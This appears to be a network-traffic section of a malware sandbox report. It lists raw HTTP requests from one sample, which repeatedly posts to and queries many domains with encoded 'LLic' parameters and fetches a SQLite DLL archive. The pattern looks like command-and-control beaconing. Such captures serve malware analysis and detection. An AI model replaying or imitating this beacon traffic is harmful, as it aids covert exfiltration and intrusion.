Network Analysis

POST /bzd4/ HTTP/1.1 Host: www.u939.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Length: 193 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.u939.top Referer: http://www.u939.top/bzd4/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 302 Found Date: Wed, 23 Apr 2025 07:28:43 GMT Content-Length: 0 Connection: close location: https://tz.wx-ulslyd12.com/app/register.php?site_id=2304&topId=55401 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DSMZfhGICJZMXZw2U2Kz%2BASQrCvUDxecfUXGuO3IqWMxu6AA87sAIMwuzI9m%2BLV3MQWL3GUYGUu1p5l7MRq3CycOLo8UdoQ%2B0nl6x6n1s64fT%2FzkPY7rW1P%2FhUOIHy4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 934ba54d1f707be9-LAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=137219&min_rtt=137219&rtt_var=68609&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

GET /bzd4/?LLic=dfSAi8eFG8BNQSKkeeWstgieQ+CEa6NReeHNvP0PJ6u+RJbJfiLK0etwAJJBhacWKaM27nZDkTYaE096JcPOh2DDpT2lFzPFjknSW/IkA4ndNNbJZBed4KRKzQBeBju3mgs613k=&RoZeZ=y3sZclTe3T0 HTTP/1.1 Host: www.u939.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 302 Found Date: Wed, 23 Apr 2025 07:28:46 GMT Content-Length: 0 Connection: close location: https://tz.wx-ulslyd12.com/app/register.php?site_id=2304&topId=55401 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zUOhi%2F8a5jYAuVyqdP2v58F0Ld5xllIYAfHh0hPqCCcLR7SIilR%2BSJn%2FWvR0UJwYpJ2o7xP9pzTmcqv04n%2FJL1MbNNK7YhMneWtq1RnYHntAEi%2Fif1%2FdhSmizYnT%2FpQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 934ba55d8ca92110-LAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=135469&min_rtt=135469&rtt_var=67734&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=498&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

GET /2018/sqlite-dll-win32-x86-3230000.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko Host: www.sqlite.org Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Connection: keep-alive Date: Wed, 23 Apr 2025 07:28:48 GMT Last-Modified: Mon, 07 Apr 2025 18:54:09 GMT Cache-Control: max-age=120 ETag: "m67f41f51s6e1ef" Content-type: application/zip; charset=utf-8 Content-length: 451055

POST /xawa/ HTTP/1.1 Host: www.shopystart.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Length: 205 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.shopystart.store Referer: http://www.shopystart.store/xawa/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 200 OK date: Wed, 23 Apr 2025 07:29:01 GMT server: Apache set-cookie: __tad=1745393341.6255080; expires=Sat, 21-Apr-2035 07:29:01 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 579 content-type: text/html; charset=UTF-8 connection: close

GET /xawa/?LLic=Hqe3sOWJvKCWG/x9tNOlnmsQdBHF4VkLrMyXLOB2T5GmWe087lKVGDOw/FRPsxL2tEDkrod/hD8oPOSEwNhmE1ycDQdQk408J5XLpsuL26K2loZJVyUeuNavvlrKPQfBqaCahko=&RoZeZ=y3sZclTe3T0 HTTP/1.1 Host: www.shopystart.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 302 Found date: Wed, 23 Apr 2025 07:29:04 GMT server: Apache set-cookie: __tad=1745393344.2507728; expires=Sat, 21-Apr-2035 07:29:04 GMT; Max-Age=315360000 location: https://www.shopystart.store/xawa/?LLic=Hqe3sOWJvKCWG/x9tNOlnmsQdBHF4VkLrMyXLOB2T5GmWe087lKVGDOw/FRPsxL2tEDkrod/hD8oPOSEwNhmE1ycDQdQk408J5XLpsuL26K2loZJVyUeuNavvlrKPQfBqaCahko=&RoZeZ=y3sZclTe3T0 content-length: 0 content-type: text/html; charset=UTF-8 connection: close

POST /h2o8/ HTTP/1.1 Host: www.well-prophesied.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Length: 205 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.well-prophesied.sbs Referer: http://www.well-prophesied.sbs/h2o8/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 200 OK date: Wed, 23 Apr 2025 07:29:09 GMT server: Apache set-cookie: __tad=1745393349.2120970; expires=Sat, 21-Apr-2035 07:29:09 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 583 content-type: text/html; charset=UTF-8 connection: close

GET /h2o8/?LLic=GasKOeuw1JI5h6tXmsQQYMGJUVrx1eFJOZVDlep8qfAVHybpHoIo+PFBF4ns1FAfwqZlwcxStctxSnKcnqSj+eRL58eeY/R3kJn5hrlHuHS0/dgrlTIfSHBOULAVJxCkB2Uk7D4=&RoZeZ=y3sZclTe3T0 HTTP/1.1 Host: www.well-prophesied.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 302 Found date: Wed, 23 Apr 2025 07:29:12 GMT server: Apache set-cookie: __tad=1745393352.1933830; expires=Sat, 21-Apr-2035 07:29:12 GMT; Max-Age=315360000 location: https://www.well-prophesied.sbs/h2o8/?LLic=GasKOeuw1JI5h6tXmsQQYMGJUVrx1eFJOZVDlep8qfAVHybpHoIo+PFBF4ns1FAfwqZlwcxStctxSnKcnqSj+eRL58eeY/R3kJn5hrlHuHS0/dgrlTIfSHBOULAVJxCkB2Uk7D4=&RoZeZ=y3sZclTe3T0 content-length: 0 content-type: text/html; charset=UTF-8 connection: close

POST /98jk/ HTTP/1.1 Host: www.nordstrom.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Length: 205 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.nordstrom.com Referer: http://www.nordstrom.com/98jk/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 301 Moved Permanently Connection: close Content-Length: 0 Server: Varnish Retry-After: 0 Location: https://www.nordstrom.com/98jk/ Accept-Ranges: bytes Date: Wed, 23 Apr 2025 07:29:17 GMT Via: 1.1 varnish X-Served-By: cache-icn1450063-ICN X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1745393357.476263,VS0,VE0 Strict-Transport-Security: max-age=31536000; includeSubDomains Server-Timing: HIT-SYNTH, fastly;desc="Edge time";dur=0 Timing-Allow-Origin: * X-Content-Type-Options: nosniff ACCESS-CONTROL-ALLOW-CREDENTIALS: true

GET /98jk/?LLic=6yfylvcvS++fp6TLHWbr9Om1+7b2UWch18pSN7AMWcDhtKMO0/Cw84EQwjIAc2w/A3ifRwr08JZ1XjD7JgM2poD+VAQYWS5a68nT5zaoDlnKZNXeNNMQ+OUueokKl8hgqtq40ZA=&RoZeZ=y3sZclTe3T0 HTTP/1.1 Host: www.nordstrom.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 301 Moved Permanently Connection: close Content-Length: 0 Server: Varnish Retry-After: 0 Location: https://www.nordstrom.com/98jk/?LLic=6yfylvcvS++fp6TLHWbr9Om1+7b2UWch18pSN7AMWcDhtKMO0/Cw84EQwjIAc2w/A3ifRwr08JZ1XjD7JgM2poD+VAQYWS5a68nT5zaoDlnKZNXeNNMQ+OUueokKl8hgqtq40ZA=&RoZeZ=y3sZclTe3T0 Accept-Ranges: bytes Date: Wed, 23 Apr 2025 07:29:19 GMT Via: 1.1 varnish X-Served-By: cache-icn1450064-ICN X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1745393360.993599,VS0,VE0 Strict-Transport-Security: max-age=31536000; includeSubDomains Server-Timing: HIT-SYNTH, fastly;desc="Edge time";dur=0 Timing-Allow-Origin: * cache-control: max-age=5 X-Content-Type-Options: nosniff

POST /y0er/ HTTP/1.1 Host: www.thought-hop.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Length: 205 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.thought-hop.app Referer: http://www.thought-hop.app/y0er/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

GET /y0er/?LLic=skpibTBgczcyQH4m12d8C1UJ3RPHJZF3wrOd/jHomuoDvk4OJWpzHm44saXJlLM8fEnYzzT5lGIlIVcd3V+fF+SAeK/GZohWhAiyD9OVQT9eoRINgfF8jLIXuBV+ExgzdvYkTl4=&RoZeZ=y3sZclTe3T0 HTTP/1.1 Host: www.thought-hop.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 200 OK content-type: text/html date: Wed, 23 Apr 2025 07:29:27 GMT content-length: 274 connection: close

POST /hnte/ HTTP/1.1 Host: www.zixvy.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Length: 205 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.zixvy.xyz Referer: http://www.zixvy.xyz/hnte/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 404 Not Found Date: Wed, 23 Apr 2025 07:29:33 GMT Server: Apache Content-Length: 13840 Connection: close Content-Type: text/html

GET /hnte/?LLic=sI+u/jozY7y4BLncChw34oy3qiLvCLYPrfQ7iAol4uU1p4g/amPevW/QK39bv96q+0RYO4Tlq1wnZyWsMRRRiThhZPuK1bAAtVzlD/5Gqm+oEyC7jbV+5JETXM/HvY9z4pcpbIw=&RoZeZ=y3sZclTe3T0 HTTP/1.1 Host: www.zixvy.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 404 Not Found Date: Wed, 23 Apr 2025 07:29:35 GMT Server: Apache Content-Length: 13840 Connection: close Content-Type: text/html; charset=utf-8

POST /lcva/ HTTP/1.1 Host: www.436bet.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Length: 205 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.436bet.lol Referer: http://www.436bet.lol/lcva/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 400 Bad Request Date: Wed, 23 Apr 2025 07:29:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gHPIfm2jSEbHb3UXOTwONm0nsyjs1l506vCzwuxN1jU5unV0brvEbT1cCM6YeOaqhkcaueZC%2FLwlPWixEGFqZqDZBPZazwyGj%2BIG2qOgPS8Aava2F5pqoLTCHRKJCeX%2FJA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 934ba6b8bc9fcb9a-LAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=128611&min_rtt=128611&rtt_var=64305&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

GET /lcva/?LLic=yZdZFwPo/F7DkqOxVlpI77acvLTqB1eK2prRl5AVT7+V22ij6c1b2GrCApRScaku22nFvhUrd1dFunhapC/kC6lEc/8q+LjQvk+zyagC4zUK5k5HSV9I08dj3iPUh9x2K1T1lq0=&RoZeZ=y3sZclTe3T0 HTTP/1.1 Host: www.436bet.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 504 Gateway Time-out Date: Wed, 23 Apr 2025 07:29:43 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZT7rHvOoIH4J8Qcp3u6oa141K3C6CFQtevcpVELtS7CHcRA45fZqnmNcfFbv2xTua04Cv8TYfLkAm1TrHhUV4%2BvkSFvLqorEtc4rI1LSfCRLxB4Nzr%2F2hFqbfgcc1LP7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 934ba6c9293d52a1-LAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=132246&min_rtt=132246&rtt_var=66123&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=500&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

POST /tyrp/ HTTP/1.1 Host: www.igbee.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Length: 205 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.igbee.online Referer: http://www.igbee.online/tyrp/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

GET /tyrp/?LLic=yQRDl9eqxDlbdwexYxSCpR6pr/oobBw9bM4yRFM7l4j8aoJR3UqZzvH2c2cbZPB09p82YJ+A3upk+Qx3qqTmrrfMXWWhvKVFsoH31/tqMrrIuEbR3JJSNGgXQUi267FU2yHTG5M=&RoZeZ=y3sZclTe3T0 HTTP/1.1 Host: www.igbee.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

HTTP/1.1 200 OK Date: Wed, 23 Apr 2025 07:29:45 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=908vr492938986113034733; expires=Mon, 22-Apr-2030 07:29:46 GMT; Max-Age=157680000; path=/; domain=www.igbee.online; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Fk+nRDAlUi9F7S5JbgYg84VmghLXQmakBc2L142x1oIDfrNmH4yIFKl58dZyGnwC6xpt1HwxDL/vzREAolc7WQ== Content-Length: 2603 Content-Type: text/html; charset=UTF-8 Connection: close